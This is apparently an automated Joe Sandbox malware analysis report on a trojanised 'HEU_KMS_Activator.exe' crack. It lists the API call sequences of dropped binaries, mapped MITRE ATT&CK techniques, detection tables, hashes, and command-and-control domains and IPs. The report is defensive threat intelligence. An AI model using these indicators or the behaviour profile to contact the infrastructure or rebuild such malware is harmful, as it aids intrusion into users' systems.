Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C3D2A0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,_strlen,send,recv,_memcmp,closesocket,closesocket,closesocket,closesocket,@_RTC_CheckStackVars@8, 3_2_00C3D2A0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C4C000 bind,WSAGetLastError,@_RTC_CheckStackVars@8, 3_2_00C4C000
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C25120 _strlen,_strlen,_strlen,_strlen,_strlen,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,htons,htons,WSAGetLastError,@_RTC_CheckStackVars@8, 3_2_00C25120
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Code function: 3_2_00C5BA80 _strlen,_strlen,_strlen,_strncpy,_strcat,_strncpy,_strcat,getsockname,WSAGetLastError,WSAGetLastError,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,@_RTC_CheckStackVars@8, 3_2_00C5BA80
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00E8FE00 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,closesocket,closesocket,closesocket,closesocket,closesocket, 17_2_00E8FE00
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00E982B3 bind,WSAGetLastError, 17_2_00E982B3
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00E81370 ___from_strstr_to_strchr,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 17_2_00E81370
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00E984C0 bind,WSAGetLastError, 17_2_00E984C0
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Code function: 17_2_00EA1B70 ___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons, 17_2_00EA1B70
MITRE ATT&CK Matrix (table residue; only the textual cells are recoverable). Columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Techniques flagged for this sample, with the count badge exactly as shown in the matrix:

  • Execution: Windows Management Instrumentation (2), Native API (13), Command and Scripting Interpreter (13), Service Execution (12)
  • Persistence: DLL Side-Loading (1), Windows Service (24), Bootkit (1)
  • Privilege Escalation: DLL Side-Loading (1), Windows Service (24), Process Injection (12)
  • Defense Evasion: Disable or Modify Tools (31), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (1), DLL Side-Loading (1), File Deletion (1), Masquerading (131), Virtualization/Sandbox Evasion (14), Process Injection (12), Bootkit (1)
  • Credential Access: Input Capture (11)
  • Discovery: System Time Discovery (12), File and Directory Discovery (3), System Information Discovery (56), Security Software Discovery (281), Virtualization/Sandbox Evasion (14), Process Discovery (2), Application Window Discovery (1), Remote System Discovery (1), System Network Configuration Discovery (11)
  • Lateral Movement: Exploitation of Remote Services (1)
  • Collection: Input Capture (11), Archive Collected Data (12), Clipboard Data (1)
  • Command and Control: Ingress Tool Transfer (2), Encrypted Channel (21), Non-Application Layer Protocol (3), Application Layer Protocol (4)
  • Impact: Data Encrypted for Impact (1), System Shutdown/Reboot (1)

No techniques were flagged in the Reconnaissance, Resource Development, Initial Access or Exfiltration columns.
Behavior Graph (graph residue; only the node labels are recoverable). Behavior Graph ID: 1480974. Sample: HEU_KMS_Activator.exe. Startdate: 25/07/2024. Architecture: WINDOWS. Score: 100.

Network nodes: www.wshifen.com (103.235.46.96, port 80, BAIDU Beijing Baidu Netcom Science and Technology Co Ltd, Hong Kong), contacted by J8156NOVDEC.exe; db.testyk.com (103.224.212.211, port 443) and da.testiu.com (103.224.212.216, port 443), both TRELLIAN-AS-AP Trellian Pty Limited AU, Australia, and du.testjj.com (72.52.179.174, port 443, LIQUIDWEB US, United States), all contacted by wrme.exe; 127.0.0.1 (unknown), contacted by PING.EXE; www.baidu.com and 5 other IPs or domains.

Process nodes: HEU_KMS_Activator.exe drops KMDF_Protect.sys (PE32+), KMDF_LOOK.sys (PE32+), DvLayout.exe (PE32) and 7 other files (6 malicious) and starts HEU_KMS_Activator.exe, _J8156NOVDEC.exe and DvLayout.exe. The second HEU_KMS_Activator.exe drops HEU_KMS_Activator.exe (PE32), autC8A0.tmp (7-zip) and 7Z.EXE (PE32) and starts 7Z.EXE, kms_x64.exe, cmd.exe and 6 other processes; its cmd.exe starts netsh.exe. _J8156NOVDEC.exe drops J8156NOVDEC.exe (PE32) and starts cmd.exe, which starts PING.EXE. J8156NOVDEC.exe starts WMIC.exe. DvLayout.exe drops mvtnom.sys (copy, PE32+) and CbDServices.sys (copy, PE32+) and starts powercfg.exe and wrme.exe. 7Z.EXE drops cleanospp.exe (PE32), SppExtComObjHook.dll (PE32), SetACL.exe (PE32) and 11 other files (9 malicious). svchost.exe starts MpCmdRun.exe. Several conhost.exe children are attached to these processes.

Signatures attached to graph nodes: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Binary is likely a compiled AutoIt script file; Drops executables to the windows directory (C:\Windows) and starts them; Sample is not signed and drops a device driver; Contains functionality to infect the boot sector; Changes security center settings (notifications, updates, antivirus, firewall); Query firmware table information (likely to detect VMs); Uses powercfg.exe to modify the power settings; Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks; Uses netsh to modify the Windows network and firewall settings; 8 other signatures.

Source | Detection | Scanner | Label
HEU_KMS_Activator.exe | 68% | ReversingLabs | Win32.Trojan.Generic
HEU_KMS_Activator.exe | 74% | Virustotal |
HEU_KMS_Activator.exe | 100% | Avira | TR/Agent.acbe
HEU_KMS_Activator.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | 100% | Avira | TR/Agent.vdqps
C:\Windows\System32\drivers\KMDF_LOOK.sys | 100% | Avira | HEUR/AGEN.1303604
C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | 100% | Avira | TR/Agent.vdqps
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe | 100% | Avira | RKIT/Agent.xdjdp
C:\Windows\System32\drivers\DvLayout.exe | 100% | Avira | TR/Agent.ugoop
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | 100% | Avira | RKIT/Agent.moamk
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe | 100% | Avira | TR/Agent.tzwxs
C:\Windows\System32\drivers\KMDF_Protect.sys | 100% | Avira | HEUR/AGEN.1303604
C:\Users\user\AppData\Local\Temp\autC8A0.tmp | 100% | Joe Sandbox ML |
C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | 100% | Joe Sandbox ML |
C:\Windows\_temp07242019502489\kms.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exe | 71% | ReversingLabs | Win32.PUA.Kuping
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe | 86% | ReversingLabs | Win32.Trojan.Kuping
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | 58% | ReversingLabs | Win32.Trojan.Kuping
C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe | 83% | ReversingLabs | Win32.Trojan.Kuping
C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe | 66% | ReversingLabs | Win32.Hacktool.KmsActivator
C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | 87% | ReversingLabs | Win32.Trojan.SchoolBoy
C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | 87% | ReversingLabs | Win32.Trojan.SchoolBoy
C:\Users\user\AppData\Local\Temp\nsoB6EE.tmp\System.dll | 0% | ReversingLabs |
C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe | 66% | ReversingLabs | Win32.Hacktool.KmsActivator
C:\Windows\System32\drivers\DvLayout.exe | 69% | ReversingLabs | Win32.Backdoor.Terbix
C:\Windows\System32\drivers\KMDF_LOOK.sys | 88% | ReversingLabs | Win64.Trojan.Kuping
C:\Windows\System32\drivers\KMDF_Protect.sys | 50% | ReversingLabs | Win64.Trojan.Starter
C:\Windows\_temp07242019502489\7Z.EXE | 0% | ReversingLabs |
C:\Windows\_temp07242019502489\kms-client.exe | 33% | ReversingLabs | Win32.Hacktool.AutoKMS
C:\Windows\_temp07242019502489\kms-server.exe | 49% | ReversingLabs | Win32.Hacktool.AutoKMS
C:\Windows\_temp07242019502489\kms.exe | 56% | ReversingLabs | Win32.Hacktool.KmsActivator
C:\Windows\_temp07242019502489\kms_x64.exe | 4% | ReversingLabs |
C:\Windows\_temp07242019502489\x64\SECOPatcher.dll | 46% | ReversingLabs | Win64.Hacktool.KMSActivator
C:\Windows\_temp07242019502489\x64\SetACL.exe | 0% | ReversingLabs |
C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dll | 0% | ReversingLabs |
C:\Windows\_temp07242019502489\x64\cleanospp.exe | 0% | ReversingLabs |
C:\Windows\_temp07242019502489\x64\msvcr100.dll | 0% | ReversingLabs |
C:\Windows\_temp07242019502489\x86\SECOPatcher.dll | 33% | ReversingLabs | Win32.Hacktool.KmsAuto
C:\Windows\_temp07242019502489\x86\SetACL.exe | 0% | ReversingLabs |
C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dll | 13% | ReversingLabs |
C:\Windows\_temp07242019502489\x86\cleanospp.exe | 0% | ReversingLabs |
C:\Windows\_temp07242019502489\x86\msvcr100.dll | 0% | ReversingLabs |
C:\Windows\system32\drivers\CbDServices.sys (copy) | 50% | ReversingLabs | Win64.Trojan.Starter
C:\Windows\system32\drivers\mvtnom.sys (copy) | 88% | ReversingLabs | Win64.Trojan.Kuping
No Antivirus matches
Source | Detection | Scanner | Label
du.testjj.com | 10% | Virustotal |
www.wshifen.com | 0% | Virustotal |
da.testiu.com | 4% | Virustotal |
db.testyk.com | 10% | Virustotal |
time.windows.com | 0% | Virustotal |
www.baidu.com | 1% | Virustotal |
http://www.baidu.com/s?ie=utf-8&wd=ipUrlTest10%Avira URL Cloudsafe
https://du.testjj.com/api/v1/id$0%Avira URL Cloudsafe
https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pinvalid0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=0%Avira URL Cloudsafe
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/0%Avira URL Cloudsafe
http://rk5.gndh888.tophttp://rk6.gndh888.top0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Locations0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/0%Avira URL Cloudsafe
https://dev.virtualearth.net/mapcontrol/logging.ashx0%Avira URL Cloudsafe
http://helgeklein.com/setacl/0%Avira URL Cloudsafe
https://db.testyk.com100%Avira URL Cloudmalware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
du.testjj.com | 72.52.179.174 | true | false | | unknown
www.wshifen.com | 103.235.46.96 | true | false | | unknown
da.testiu.com | 103.224.212.216 | true | false | | unknown
db.testyk.com | 103.224.212.211 | true | false | | unknown
time.windows.com | unknown | unknown | false | | unknown
www.baidu.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
https://db.testyk.com/api/v1/p | false | 11% Virustotal; Avira URL Cloud: malware | unknown
https://da.testiu.com/api/v1/p | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
103.224.212.211 | db.testyk.com | Australia | 133618 | TRELLIAN-AS-AP Trellian Pty Limited AU | false
72.52.179.174 | du.testjj.com | United States | 32244 | LIQUIDWEB US | false
103.235.46.96 | www.wshifen.com | Hong Kong | 55967 | BAIDU Beijing Baidu Netcom Science and Technology Co Ltd | false
103.224.212.216 | da.testiu.com | Australia | 133618 | TRELLIAN-AS-AP Trellian Pty Limited AU | false
IP
127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1480974
Start date and time: 2024-07-25 02:18:54 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 49
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HEU_KMS_Activator.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@64/79@5/5
EGA Information:
  • Successful, ratio: 85.7%
HCA Information:
  • Successful, ratio: 67%
  • Number of executed functions: 36
  • Number of non-executed functions: 284
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe
  • Excluded IPs from analysis (whitelisted): 20.101.57.9, 184.28.90.27
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, twc.trafficmanager.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target _J8156NOVDEC.exe, PID 2928, because there are no executed functions
  • Not all processes were analyzed; the report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
--- | --- | ---
20:19:50 | API Interceptor | 1x Sleep call for process: wrme.exe modified
20:19:51 | API Interceptor | 2x Sleep call for process: svchost.exe modified
20:19:54 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
20:20:53 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
  • www.baidu.com/
Tas8_WL.dllGet hashmaliciousBlackMoonBrowse
  • www.baidu.com/
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| www.wshifen.com | d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe | malicious | Bdaejec | 103.235.47.188 |
| | 7Y18r(174).exe | malicious | Nitol | 103.235.47.188 |
| | 7Y18r(100).exe | malicious | Unknown | 103.235.47.188 |
| | 7Y18r(100).exe | malicious | Unknown | 103.235.47.188 |
| | http://aggwgwqghgmyti.com/pfd12_2000002719_4001340.exe | malicious | Unknown | 103.235.46.96 |
| | qGJBgGtR7e.exe | malicious | Gh0stCringe, GhostRat, Mimikatz, RunningRAT | 103.235.46.96 |
| | Yiwaiwai Build Version.exe | malicious | Unknown | 103.235.47.188 |
| | KLL.exe | malicious | Unknown | 103.235.46.96 |
| | Yiwaiwai Build Version.exe | malicious | Unknown | 103.235.47.188 |
| | KLL.exe | malicious | Unknown | 103.235.47.188 |
| db.testyk.com | baofeng15.0.exe | malicious | Unknown | 103.224.212.220 |
| du.testjj.com | J838.exe | malicious | Unknown | 72.52.179.174 |
| | baofeng15.0.exe | malicious | Unknown | 146.148.34.125 |
| da.testiu.com | baofeng15.0.exe | malicious | Unknown | 70.32.1.32 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| TRELLIAN-AS-APTrellianPtyLimitedAU | Ia93PTYivQ.exe | malicious | BlackMoon, Neshta | 103.224.212.216 |
| | DHL_497104778908.exe | malicious | FormBook | 103.224.182.210 |
| | http://futamuragroup.com | malicious | Unknown | 103.224.182.250 |
| | nell.doc | malicious | FormBook | 103.224.182.253 |
| | Petromasila 16072024.exe | malicious | FormBook, PureLog Stealer | 103.224.182.242 |
| | swift copy.exe | malicious | FormBook | 103.224.212.214 |
| | MBL- B-1440 Draft Invoice.exe | malicious | FormBook | 103.224.212.210 |
| | 8tvMmyxveyzFcnJ.exe | malicious | FormBook | 103.224.212.213 |
| | Arrival Notice_AWB 4560943391.vbe | malicious | FormBook, GuLoader | 103.224.212.216 |
| | NGL 700800.exe | malicious | FormBook | 103.224.182.250 |
| LIQUIDWEBUS | 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe | malicious | Bdaejec, Socelars | 67.225.218.41 |
| | 4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe | malicious | Bdaejec, Socelars | 67.225.218.41 |
| | http://datingsitefree.pages.dev/link-2 | malicious | Unknown | 69.16.230.228 |
| | 0SpHek7Jd8.elf | malicious | Unknown | 67.225.140.112 |
| | SecuriteInfo.com.FileRepMalware.25505.20211.exe | malicious | Unknown | 67.225.140.112 |
| | SC61092U5IO.exe | malicious | FormBook | 72.52.179.174 |
| | LSW7109326UNI0.exe | malicious | FormBook | 72.52.179.174 |
| | Fatura20240617.exe | malicious | FormBook | 72.52.179.174 |
| | SC61092U5IO.exe | malicious | FormBook | 72.52.179.174 |
| | http://iffashionenterprise.com/liveparty | malicious | HTMLPhisher | 67.225.188.253 |
| BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd | d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe | malicious | Bdaejec | 103.235.46.98 |
| | 7Y18r(174).exe | malicious | Nitol | 103.235.47.188 |
| | 7Y18r(100).exe | malicious | Unknown | 103.235.47.188 |
| | 7Y18r(100).exe | malicious | Unknown | 103.235.47.188 |
| | http://aggwgwqghgmyti.com/pfd12_2000002719_4001340.exe | malicious | Unknown | 103.235.46.96 |
| | qGJBgGtR7e.exe | malicious | Gh0stCringe, GhostRat, Mimikatz, RunningRAT | 103.235.46.96 |
| | #U5b89#U88c5#U67e5#U770b.msi | malicious | GhostRat | 103.235.47.238 |
| | Yiwaiwai Build Version.exe | malicious | Unknown | 103.235.46.96 |
| | KLL.exe | malicious | Unknown | 103.235.46.96 |
| | Yiwaiwai Build Version.exe | malicious | Unknown | 103.235.46.96 |
| TRELLIAN-AS-APTrellianPtyLimitedAU | Ia93PTYivQ.exe | malicious | BlackMoon, Neshta | 103.224.212.216 |
| | DHL_497104778908.exe | malicious | FormBook | 103.224.182.210 |
| | http://futamuragroup.com | malicious | Unknown | 103.224.182.250 |
| | nell.doc | malicious | FormBook | 103.224.182.253 |
| | Petromasila 16072024.exe | malicious | FormBook, PureLog Stealer | 103.224.182.242 |
| | swift copy.exe | malicious | FormBook | 103.224.212.214 |
| | MBL- B-1440 Draft Invoice.exe | malicious | FormBook | 103.224.212.210 |
| | 8tvMmyxveyzFcnJ.exe | malicious | FormBook | 103.224.212.213 |
| | Arrival Notice_AWB 4560943391.vbe | malicious | FormBook, GuLoader | 103.224.212.216 |
| | NGL 700800.exe | malicious | FormBook | 103.224.182.250 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 74954a0c86284d0d6e1c4efefe92b521 | SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe | malicious | Unknown | 103.224.212.211; 103.224.212.216 |
| | SecuriteInfo.com.Riskware.OfferCore.5002.4698.exe | malicious | PrivateLoader | 103.224.212.211; 103.224.212.216 |
| | SecuriteInfo.com.W32.Kryptik.CI.tr.21358.1519.exe | malicious | Unknown | 103.224.212.211; 103.224.212.216 |
| | golang-modules.exe | malicious | Unknown | 103.224.212.211; 103.224.212.216 |
| | SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe | malicious | Unknown | 103.224.212.211; 103.224.212.216 |
| | Letter-04.doc | malicious | Unknown | 103.224.212.211; 103.224.212.216 |
| | chromeUpdate.exe | malicious | Unknown | 103.224.212.211; 103.224.212.216 |
| | PRE-PCM DMD VSAT 2024-25 OF BAF Sta SNR.doc | malicious | Unknown | 103.224.212.211; 103.224.212.216 |
| | TS-240617-UF1.exe | malicious | Python Stealer, Creal Stealer | 103.224.212.211; 103.224.212.216 |
| | TS-240609-CStealer1.exe | malicious | Python Stealer, Creal Stealer | 103.224.212.211; 103.224.212.216 |
No context
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.7066953895159234
Encrypted:false
SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq+:2JIB/wUKUKQncEmYRTwh0i
MD5:B53535B4E7D4BD7A9BD21DA996BBF7D7
SHA1:A7A0E20664C893A693A0531F5F86B465A4777F4C
SHA-256:DFDAAEF8049CF070CB2F432F476AC41233D019DC803303463999A793F15441DF
SHA-512:0418B629F9DB04C8FFC3E365A9E4188126421AE7B79F483A5A5D919773732049195A580DF6E56D8C4DD9E40B87482BE86C4C69DB7F69766BDE0F498395E5F733
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0717f162, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.789919675618007
Encrypted:false
SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
MD5:96BB73A009D8C09B314B0C5577A86286
SHA1:33D3B75272D439CCD39E3535705704E0A8F3570E
SHA-256:26C10C22874F9EBE79893A550353F9E10CDA2408129139F1889892354700AD7F
SHA-512:4F06D1BEB1DAD5526897B29FF15A8D178130376051E3D0316774AF918C3A5575841D65C0B0BB1A55E9BF85FB4AB975E8C491BF2866A21A691EB3C7DFE6DB7CD1
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.07955437610271106
Encrypted:false
SSDEEP:3:yeiyYehC1yDNt/57Dek3JMZ/tollEqW3l/TjzzQ/t:yeiyzhVDPR3tMZemd8/
MD5:1F39E5BAEAB1BA5A437D867992508220
SHA1:2FF1C6FE1C48311DC0E2BB1B36BDC97157163D61
SHA-256:2D587267CD406E6399AF5ED1973C5B0C40CF8E589CBC7501264ECF46277614B7
SHA-512:B953C12AFA27878FF5465C52096E550ADE43F2348E578430A1039EB3808396EBA167014AF99C785B853BE4B7CA484A1F1A011A7F821412F22FFF4AEDC2FFD56C
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):4096
Entropy (8bit):1.1941033064984463
Encrypted:false
SSDEEP:12:3rEjqPqF69Fq5Te7p2Tk56GWtbgjO3s7Nxk56GBFS5Ubj5EN:gc1bEGtm2jGtBFS5iiN
MD5:31667B4C0A3AFB8BCE94298B485CCBEB
SHA1:BE2F4A23E8079606652721719357C2BD8222C825
SHA-256:A61BDFDC7EA058EACA89FA05EE893222AA230277043805F4A259F7E8413A4E31
SHA-512:D4391951A7358580B3FF72DB0EAE49C1D29C5BE00FDC35EAF7D96F7487A6CD814049E1AE42445086BE222BA0F8D339FD68BF0FC0749D1BE1101BB9326D87A478
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):999
Entropy (8bit):4.966299883488245
Encrypted:false
SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
MD5:24567B9212F806F6E3E27CDEB07728C0
SHA1:371AE77042FFF52327BF4B929495D5603404107D
SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):123728
Entropy (8bit):6.528901233316943
Encrypted:false
SSDEEP:3072:LqBDdwh4kNDDSRsMQ6E3txEUe/yMkLr3zv4TH1lm:LqBxoBMweU9jQlm
MD5:030C2DD5B0F24DD5717D4155EEE414D2
SHA1:FB0D6497CE31C93D0E05547A889D52A3C537DB60
SHA-256:64A9C8E5BD1F6B8FA6CF7EF6B4B75223524884EFD47DB4F36E6DB6BC933186D3
SHA-512:2FBA7FCE26E88B39589FD5CBCA01FFE36762C497B0CBA6CF7370BFF234237801A654D977DB71D715E2644888A6ABE6ECB33A2383F24CA6BB9D0BA1CAF20EF4B3
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 71%
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):695632
Entropy (8bit):6.70373578717237
Encrypted:false
SSDEEP:12288:4WrLRvmP3mxdWjSIQ1cMsk4GyKA+HtuTFHV7GOoNKaDm9cTCLYuiQtTCOwjXVe/z:4W2PxQWNk4GyKA+wTF90JvTCLBTCRwr
MD5:6BD4A78C50FAFB1ACAF06FF088808D06
SHA1:18D604BFE96E686FC8F9641B2EE9EE5242CA20CB
SHA-256:BDA0D1C3949BD38F37F9D245966E3AC92A9AC47773FFAE54E0C93600F6164982
SHA-512:20B7F24ACCBFCB2F4217396A4B9DC4698E2FE7D494C3D88BACFC78C980E5B2396A6B1BE8D50F76B8C1F6B9993FE3D53FD8A25DE590B73EC9C20AD9D59EFA5670
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 86%
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):644944
Entropy (8bit):6.672475014470129
Encrypted:false
SSDEEP:12288:Uowp8cTSxMWJsS+yUalNw0b9zg9aJMw3Fe5a3RUBFKh+TF7MVHiWrzxhWi9pHXvw:U8ypwlNLb9zgY2w3Fe5a3RQS/RrzBPHo
MD5:35C545E719D8D04771BE35081626CE3B
SHA1:03DFC7E6E54E951AC8FDBF473C60DCE5C7B292E7
SHA-256:39C46BB28E9B3F0D8C22D3BAA5F6823FEE025AE206BC7332C8C09393609BC49B
SHA-512:51DA30242F37D2E470063CD66DA0295E0D7025272EEF69189503B807B9F258643C7419270BB466B2CFAEF7FBD99313D1CEC42E23DBC8CAB96A36D54FAF4A138F
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 58%
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):774992
Entropy (8bit):6.6562066905129385
Encrypted:false
SSDEEP:12288:SfT+l3f1HiVkn/RyWZyh+RUFUjImQdqS4DtcQqvRWqyZrJ67GfsyZVpUEJDv0NYw:SfW3NHiKnSlwIFYS4DtcQqpYT7VpHlJq
MD5:340349A5D4BA3E18CAAFE565C0296AC4
SHA1:6223224A0AA34A40D6ED6EF1200CEEF4FA19E5BF
SHA-256:FA824EC8B18DBE36318FF03E7FBF974BD6C8A6256F3449D4BF77082355553445
SHA-512:6261AE41E89469FB1590FC216E45EEC2C21723E81E8B3A984998B34BEBA8C81877E36AC694D6CB903AEC02EC022BC07F5578DD89F68ADE1D8661187172D0BBFC
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 83%
